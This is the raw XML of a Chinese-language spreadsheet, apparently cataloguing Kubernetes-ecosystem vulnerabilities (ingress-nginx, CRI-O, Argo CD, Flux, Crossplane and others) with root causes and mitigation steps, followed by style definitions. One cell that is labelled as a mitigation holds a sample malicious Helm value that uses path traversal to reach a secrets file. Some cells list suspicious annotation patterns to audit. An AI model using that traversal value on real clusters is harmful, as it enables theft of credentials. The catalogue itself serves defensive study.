    <t>代码</t>
  </si>
  <si>
    <t>直接在触发漏洞的关键操作附近（如同一函数内）进行校验</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级ingress-nginx至修复版本（含PR #11719的版本）  
   - 限制RBAC权限（遵循最小权限原则，禁止非必要用户操作Ingress）  
   - 限制ingress-nginx ServiceAccount权限（通过修改ClusterRole）</t>
  </si>
  <si>
    <t>输入验证和内容筛选</t>
  </si>
  <si>
    <t xml:space="preserve">准入控制器
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>准入控制器校验：internal\admission\controller\main.go
func (ia *IngressAdmission) HandleAdmission(obj runtime.Object) (runtime.Object, error)-&gt; CheckIngress-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>inspector.DeepInspect-</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>&gt;InspectIngress</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级Ingress-NGINX至&gt;=1.5.1或应用补丁[c540b58](https://github.com/kubernetes/ingress-nginx/commit/c540b584745ac47b45f859c5db52e6b7a612a9c6)。  
   - 限制`Ingress`资源的修改权限，审计现有`annotations`中的日志配置。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级ingress-nginx至≥v1.2.0；  
   - 限制`Ingress`资源的RBAC权限；  
   - 审计现有`Ingress`的`path`字段是否包含换行符。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级`ingress-nginx`至修复版本（参考GitHub Issue #10571）。  
   - 限制`Ingress`资源写入权限（RBAC），审核现有注解内容。</t>
  </si>
  <si>
    <t>字段禁用-选择性启用</t>
  </si>
  <si>
    <t>**缓解措施**  
- 升级 `ingress-nginx` 到修复版本  
- 限制RBAC权限（禁止低权限用户修改Ingress注解）  
- 使用策略工具（如OPA）校验注解内容</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级`ingress-nginx`至≥v1.2.0或≥v1.1.3版本。  
   - 限制RBAC：仅授权可信用户操作`Ingress`资源。  
   - 限制控制器权限：通过`--watch-secret-namespace`限制Secret访问范围。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级ingress-nginx至v1.2.0+/v1.1.3+  
   - 限制RBAC权限（遵循最小特权原则，禁用非必要账户的Ingress写权限）  
   - 启用`--enable-annotation-check`参数限制路径正则表达式</t>
  </si>
  <si>
    <t>原本只对管理员可访问的配置文件在K8s环境中可被普通用户修改</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级ingress-nginx至≥v1.2.0（禁用`snippet`功能）  
   - 在ConfigMap中设置`allow-snippet-annotations: "false"`  
   - RBAC限制普通用户操作Ingress资源</t>
  </si>
  <si>
    <t>校验责任混淆-k8s安全策略忽略</t>
  </si>
  <si>
    <t>未对RBAC权限进行验证</t>
  </si>
  <si>
    <t>资源控制器</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Istio至1.12.2+；  
   - 移除`gateways.gateway.networking.k8s.io` CRD；  
   - 限制非信任用户的Gateway API CREATE权限。</t>
  </si>
  <si>
    <t>校验责任混淆</t>
  </si>
  <si>
    <t>资源抽象转换中校验断裂</t>
  </si>
  <si>
    <t>容器标准接口实现</t>
  </si>
  <si>
    <t>cri实现</t>
  </si>
  <si>
    <t>不在触发漏洞的关键操作附近（如同一函数内）进行校验</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级cri-o至修复版本（参考PR #4217中`validateSystemdProperty`函数对注解的过滤）  
   - 限制Pod注解权限（通过RBAC和准入控制器）  
   - 使用PodSecurityPolicy/OPA/Gatekeeper禁止高危注解前缀（如`systemd.*`）</t>
  </si>
  <si>
    <t>弹性资源管理需求未被满足</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级CRI-O至修复版本（含提交[f032cf6](https://github.com/cri-o/cri-o/commit/f032cf649ecc7e0c46718bd9e7814bfb317cb544)）。  
   - 限制RBAC权限（避免非必要Pod Exec操作）。  
   - 监控节点资源使用（内存/磁盘告警）。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级CRI-O至≥1.23.2/1.24.0  
   - 限制Pod创建权限（通过RBAC）  
   - 启用PodSecurityPolicy/PSA（限制`privileged`和危险annotations）</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Fluid至v0.9.3（修复命令拼接逻辑）  
   - RBAC限制CRD操作权限（最小化`*:update`权限）  
   - 启用OPA/Gatekeeper对CRD字段进行校验</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级containerd至1.6.6/1.5.13+  
   - 启用PodSecurityPolicy/OPA Gatekeeper限制高危exec命令  
   - 限制RBAC权限（禁止非信任用户创建含exec探针的Pod）</t>
  </si>
  <si>
    <t>对网络安全策略的忽视（如未对其涉及的标签进行校验）</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Cilium至修复版本（1.14.2+/1.13.7+/1.12.14+）  
   - 使用准入控制Webhook限制对关键标签（如`k8s:io.kubernetes.pod.namespace`）的修改</t>
  </si>
  <si>
    <t>对网络安全策略的忽视</t>
  </si>
  <si>
    <t>API 层</t>
  </si>
  <si>
    <t>直接在默认组件配置中禁用相关的字段examples/contour/01-contour-config.yaml中：# enableExternalNameService: false</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Contour至v1.17.1+/v1.18.0+。  
   - 限制`ExternalName` Service的创建权限（RBAC）。  
   - 网络策略禁止非授权访问Envoy admin端口（默认9001）。</t>
  </si>
  <si>
    <t>禁用字段-默认禁用</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级KubeVirt至v0.56.1+  
   - 限制RBAC权限（避免普通用户操作`VirtualMachine`资源）  
   - 禁用非必要`hostPath`挂载</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级KubeVirt至v0.30+（修复PR#3686引入隔离机制）  
   - 通过RBAC限制`hostDisk`类型资源创建  
   - 使用PodSecurityPolicy/PSA限制特权容器</t>
  </si>
  <si>
    <t>外部资源引用-html artifact</t>
  </si>
  <si>
    <t>存在资源API直接调用读写资源的组件</t>
  </si>
  <si>
    <t>**可能的缓解措施**  
- 升级至Argo Workflows v3.3.8+/v3.2.12+  
- 启用RBAC限制工作流创建权限（`argo-server --auth-mode=client`）  
- 配置CSP策略限制Argo Server的XHR调用</t>
  </si>
  <si>
    <t>外部资源引用-符号链接</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级Argo CD至修补版本（v2.4.1+）  
   - 若无Helm需求，禁用Helm工具（`argocd-cm`配置中设置`helm.enabled: false`）  
   - 限制仓库写入权限，审计Helm Chart中的符号链接。</t>
  </si>
  <si>
    <t>外部资源引用</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Argo CD至修复版本（2.3.5+/2.2.10+/2.1.16+）。  
   - 限制用户对Argo CD的敏感操作权限（RBAC）。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至Argo CD 2.1.15+/2.2.9+/2.3.4+  
   - 在ApplicationSpec中禁用目录类型源（`spec.source.directory.recurse: false`）  
   - 使用文件系统隔离的sidecar容器运行repo-server</t>
  </si>
  <si>
    <t>动态参数解析注入</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级Argo Workflows至≥3.1.4版本（PR#6442修复）  
   - 禁用`EXPRESSION_TEMPLATES`（若无需动态模板功能）  
   - 对Workflow提交实施RBAC和输入验证</t>
  </si>
  <si>
    <t>外部资源引用-gitfie</t>
  </si>
  <si>
    <t>**缓解措施**:
   - 升级至Argo Events ≥1.7.1
   - 限制Sensor使用的ServiceAccount权限
   - 启用artifact.gpg验证
   - 禁止filePath包含相对路径符号(../)</t>
  </si>
  <si>
    <t>缓解措施：  
```yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
spec:
  source:
    helm:
      values: |
        # 恶意配置示例（实际需过滤..路径）：
        configFile: "../../../../secrets/database-credentials.yaml"
```</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至Argo CD 2.1.11+/2.2.6+/2.3.0+  
   - RBAC限制Application的`create/update`权限仅限必要用户  
   - 避免在repo-server挂载Secret或使用文件型敏感数据（改用环境变量或加密存储）</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Argo CD至≥v2.6.1  
   - 限制`repositories/update`和`applications/create`权限  
   - 启用Argo CD审计日志监控异常Application操作</t>
  </si>
  <si>
    <t>引入新的功能允许外部用户访问链接（xss)</t>
  </si>
  <si>
    <t>第三组件自身</t>
  </si>
  <si>
    <t>直接在ui前端进行校验</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级Argo CD至安全版本（v2.4.1+、v2.3.5+等）。  
   - 限制用户权限（最小化RBAC），启用Argo CD审计日志。  
   - 对用户输入（如应用元数据）实施严格过滤。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级`@backstage/plugin-scaffolder-backend`到0.15.14+  
   - 限制Scaffolder模板的注册/修改权限（RBAC审计）  
   - 对模板输入参数实施路径白名单校验</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级`@backstage/plugin-scaffolder-backend`至1.15.0+。  
   - Kubernetes侧：限制Backstage Pod权限（`securityContext.readOnlyRootFilesystem: true`，禁用特权容器）。</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级`@backstage/plugin-scaffolder-backend`到≥0.15.9  
   - 限制Backstage模板注册权限  
   - 审计Scaffolder Task运行环境的文件权限（如Kubernetes Pod的Volume挂载配置）</t>
  </si>
  <si>
    <t>复杂的资源引用关系</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至`kustomize-controller v0.15.0+`（移除`kubectl`和Shell执行能力）。
   - 限制用户对`Kustomization`、`Secret`、`ServiceAccount`的创建权限。
   - 使用OPA Gatekeeper/Kyverno拦截含`secrets`字段的`ServiceAccount`。</t>
  </si>
  <si>
    <t>Kubernetes中CRD字段的多层级校验逻辑不一致</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Flux至≥0.35.0  
   - 使用Kubernetes准入控制器（如Gatekeeper）限制字段值，例如：  
     ```rego
     deny[msg] { input.spec.interval != ""; not is_valid_duration(input.spec.interval) }
     ```</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至`flux2 v0.32.0+`或`helm-controller v0.23.0+`  
   - 通过RBAC限制租户创建`HelmRelease`的权限  
   - 对控制器设置内存限制（如`resources.limits.memory`）</t>
  </si>
  <si>
    <t>**缓解措施**  
- 升级kustomize-controller至v0.24.0+  
- 使用OPA/Gatekeeper策略限制`spec.path`字段的合法范围  
- 限制RBAC权限（仅允许可信用户操作`Kustomization`资源）  
- 启用`PodSecurityPolicy`/`SecurityContext`防止容器文件系统逃逸</t>
  </si>
  <si>
    <t>**缓解措施**  
- 升级至`kustomize-controller v0.24.0+`  
- 在CI/CD流水线中添加策略检查（如OPA/Conftest验证`kustomization.yaml`路径规范）</t>
  </si>
  <si>
    <t>opa策略文件</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至flux2 v0.29.0+  
   - 使用ValidatingWebhook限制`spec.kubeConfig`字段修改  
   - 限制控制器Pod的Linux Capabilities（如移除`SYS_ADMIN`）  
   - 通过OPA/Gatekeeper实施策略：禁止非受信任用户操作Flux CRD</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级CRI-O至修复版本（参考PR #6450的代码修复）  
   - 限制Pod创建权限（RBAC最小化原则）  
   - 启用Pod安全策略（如禁止高危env命名模式）  
   - 审计环境变量命名规范（如拦截`_PAYLOAD`等可疑后缀）</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Crossplane至1.11.5/1.12.3/1.13.0+（修复镜像大小检查）。  
   - RBAC限制`Package`资源的创建权限。  
   - 为Crossplane控制器Pod配置内存限制（`resources.limits.memory`）。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级Crossplane至修复版本（1.11.2/1.10.3/1.9.2+）。  
   - 限制`Composition`的写权限仅限必要管理员。  
   - 审计现有`Composition`资源中的高索引值。</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级BMO至v0.7.0/v0.6.2/v0.5.2及以上版本。  
   - 限制BMO的RBAC权限为命名空间级别（仅允许访问同命名空间`Secret`）。  
   - 预升级时复制`Secret`到对应BMH命名空间，升级后清理旧`Secret`。</t>
  </si>
  <si>
    <t>**缓解措施**  
   - 升级Kyverno至1.13.0+（限制PolicyException作用域）  
   - 通过RBAC限制非管理员创建`PolicyException`  
   - 审计所有命名空间的`PolicyException`资源</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级SPIRE到0.11.3+/0.12.1+  
   - 避免在agent ID模板末尾使用不可控的标签变量（如`spiffe://trust.domain/path/{{ .Tag.untrusted_tag }}`）  
   - 限制EC2标签修改权限</t>
  </si>
  <si>
    <t>错误网络配置导致组件暴露</t>
  </si>
  <si>
    <t xml:space="preserve">代码：直接在模板文件中修复-》 实际由准入控制器调用的模板解析函数去处理校验
</t>
  </si>
  <si>
    <t>**缓解措施**  
- 紧急升级ingress-nginx至包含[PR#13068](https://github.com/kubernetes/ingress-nginx/pull/13068)的版本  
- 限制RBAC权限（最小化`Ingress`写权限，启用准入控制）  
- 审计现存Ingress中异常注解（含`;`、`$()`等特殊字符）</t>
  </si>
  <si>
    <t>代码：直接在模板文件中修复-》 实际由准入控制器调用的模板解析函数去处理校验</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级ingress-nginx至包含PR#13068的版本（禁用高危注解或增加输入验证）。  
   - 限制RBAC权限，仅允许可信用户操作Ingress资源。  
   - 审计现有Ingress注解是否包含可疑NGINX指令（如`proxy_pass`、`eval`）。</t>
  </si>
  <si>
    <t>**缓解措施**：  
   - 升级至`ingress-nginx`包含[commit ab470eb](https://github.com/kubernetes/ingress-nginx/commit/ab470eb920924d62a197ebddd8a4cc3031a77ddf)的版本。  
   - 限制RBAC权限（遵循最小特权原则，禁用非必要用户/ServiceAccount的Ingress写权限）。  
   - 使用准入控制器（如OPA）拦截含高危注解的Ingress资源。</t>
  </si>
  <si>
    <t>**缓解措施**:  
   - 升级至ingress-nginx ≥1.25.1（包含提交cbc1590）  
   - 启用PodSecurityPolicy限制容器文件系统写入  
   - 审计所有Ingress资源的路径字段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</si>
</sst>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1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color theme="1"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="8"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF24292E"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="8"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="9"/>
      <color theme="10"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="9"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Courier New"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFFF0000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="Times New Roman"/>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8"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FF417FF9"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <strike/>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="Courier New"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <strike/>
      <sz val="8"/>
      <name val="等线"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="3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2"/>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9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="10" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="7" borderId="11" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="8" borderId="12" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="8" borderId="11" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="9" borderId="13" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="14" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="15" applyNumberFormat="0" applyFill="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4" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54"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3" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54"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4" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="5"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3" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="151">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"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0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1"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0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3"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0" xfId="0" applyFont="1" applyFill="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0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
